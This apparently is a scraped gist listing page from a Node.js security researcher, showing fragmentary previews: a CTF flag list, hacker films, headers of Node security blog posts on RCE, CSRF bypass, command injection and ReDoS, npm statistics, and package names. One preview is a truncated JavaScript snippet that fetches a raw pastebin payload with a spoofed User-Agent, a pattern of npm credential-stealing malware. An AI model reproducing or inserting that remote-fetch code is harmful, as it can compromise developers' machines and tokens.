| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
| URLs people tried (so far): https://gist.github.com/evilpacket/6651547a3d3e39bef75eee35f321f25f | |
| Flag 1: | |
| 1. @jstash | |
| 2. @cnelson | |
| 3. @JF0LKINS | |
| Flag 2: | |
| 1. |
| (Swedish) Girl with a dragon tattoo | |
| Hackers | |
| WarGames | |
| Antitrust | |
| Swordfish | |
| TRON | |
| Sneakers | |
| Joe Dante's Explorers (1985) | |
| The imitation game | |
| The KGB, the computer, and me |
| date | slug | tags | title | author | type |
|---|---|---|---|---|---|
Wed Jan 14 17:30:08 PST 2015 |
the-dangers-of-square-bracket-notation |
security, node.js, javascript, hapi, RCE, square bracket notation, io.js |
The Dangers of Square Bracket Notation |
Jon Lamendola |
text |
We are going to be looking at some peculiar and potentially dangerous implications of Javascript's square bracket notation in this post: where you shouldn't use this style of object access and why, as well how to use it safely when needed.
| date | slug | tags | title | author | type |
|---|---|---|---|---|---|
2013-09-07 17:03:10 GMT |
bypass-connect-csrf-protection-by-abusing |
CSRF, connect, methodOverride, middleware |
Bypass Connect CSRF protection by abusing methodOverride Middleware |
Node Security Team |
text |
Since our platform isn't setup for advisories that are not specific to a particular module version, but rather a use / configuration of a certain module, we will announce this issue here and get it into the database at a later date.
| date | slug | tags | title | author | type |
|---|---|---|---|---|---|
2014-08-19 17:04:34 GMT |
Avoid-Command-Injection-Node.js |
security, node.js, injection |
Avoiding Command Injection in Node.js |
Adam Baldwin |
text |
| date | slug | tags | title | author | type |
|---|---|---|---|---|---|
Mon Nov 03 8:00:00 PDT 2014 |
regular-expression-dos-and-node.js |
security, node.js, redos |
Regular Expression DoS and Node.js |
Adam Baldwin |
text |
Imagine you are trying to buy a ticket to your favorite JavaScript conference, and instead of getting the ticket page, you instead get 500 Internal Server Error. For some reason the site is down. You can't do the thing that you want to do most and the conference is losing out on your purchase, all because the application is unavailable.
| try { | |
| var https = require("https"); | |
| https | |
| .get( | |
| { | |
| hostname: "pastebin.com", | |
| path: "/raw/XLeVP82h", | |
| headers: { | |
| "User-Agent": | |
| "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0", |
| ws: 18300469 | |
| fsevents: 17784701 | |
| gaze: 11832681 | |
| node-sass: 8865218 | |
| bson: 2686185 | |
| uws: 2360991 | |
| dtrace-provider: 1567984 | |
| pg: 1407674 | |
| grpc: 1137348 | |
| iltorb: 932043 |
| 17monip | |
| 2wire | |
| 3000 | |
| 3drotate | |
| 51degrees | |
| 64 | |
| 7lab_groove_test | |
| 7zjs | |
| @a-sync/opencv4nodejs | |
| @achingbrain/node-syslog |
